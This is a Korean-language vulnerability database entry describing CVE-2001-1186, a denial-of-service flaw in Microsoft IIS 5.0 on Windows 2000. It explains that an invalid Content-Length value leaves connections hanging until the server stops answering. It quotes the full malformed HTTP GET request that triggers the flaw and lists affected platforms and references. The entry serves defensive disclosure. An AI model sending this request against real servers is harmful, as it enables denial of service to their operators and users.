English

◀◁ 뒤로 취약점ID 12011 위험도 20 포트 80, ... 프로토콜 TCP 분류 WWW 상세설명 해당 IIS 5.0 서버는 잘못된 "Content-Length" 값을 통한 서비스 거부 공격에 취약하다. 만약, 원격지 공격자들이 다음과 같이 HTTP GET 헤더 안에 올바르지 않은 Content-Length 값을 명시하여 서버에게 전달하는 경우, GET /testfile HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: 192.168.0.10 Connection: Keep-Alive Content-Length: 5300643 Authorization: Basic IIS 웹서버는 시간초과 없이 접속이 연결된 상태를 유지한 채, 아무런 응답도 하지 않는다. 만약 이와같이 접속한 연결들이 많아질 경우 서버는 더이상 새로운 접속 요청에 대해 서비스를 하지 못하게 된다. 이는 웹서버가 서비스거부 상태가 되게 할 수도 있다. * 참고 사이트: http://www.iss.net/security_center/static/7691.php http://online.securityfocus.com/bid/3667 * 취약한 플랫폼들: Microsoft IIS 5.0 - Windows 2000 Advanced Server - Windows 2000 Advanced Server SP1/SP2 - Windows 2000 Datacenter Server SP1/SP2 - Windows 2000 Professional - Windows 2000 Professional SP1/SP2 - Windows 2000 Server - Windows 2000 Server SP1/SP2 * 취약하지 않은 플랫폼: Windows XP, VISTA, 7, 8 Windows Server 2003, 2008, 2012 해결책 2012년 4월 현재 이 취약점에 대한 해결책은 제시되어 있지 않다. 관련 URL CVE-2001-1186 (CVE) 관련 URL (SecurityFocus) 관련 URL (ISS)